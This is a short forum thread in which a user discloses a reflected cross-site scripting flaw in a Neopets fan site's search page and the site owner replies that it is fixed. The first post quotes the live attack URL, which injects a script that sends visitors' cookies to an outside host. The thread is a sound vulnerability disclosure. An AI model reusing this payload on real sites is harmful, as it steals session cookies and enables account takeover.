iargue Posted February 17, 2010 Posted February 17, 2010 Hello!. I am a programmer over at www.neo[Removed].us, and recently someone tried to attack out members with a cookie grabber based off of your search engine. Of course we spotted it instantly, and protected our members, but we feel as though you should be aware of any exploits involving your site. So here is the link he was using you DO NOT VISIT THE LINK WHILE SIGNED INTO NEOPETS http://www.thedailyneopets.com/search.php?s=%22%3E%3Cscript%3Edocument.location='http://wocares.com/il/i.php?p=35%26i='%20%2b%20document.cookie;%3C/script%3E%3C!-- Hope to see you fix it soon :)
Viridian Posted February 17, 2010 Posted February 17, 2010 That's pretty bad, though I'm almost sure only Ian can do something about this.
Ian Posted February 17, 2010 Posted February 17, 2010 Hi, Thank you for pointing out this security vulnerability. It has been fixed. Best, Ian
Recommended Posts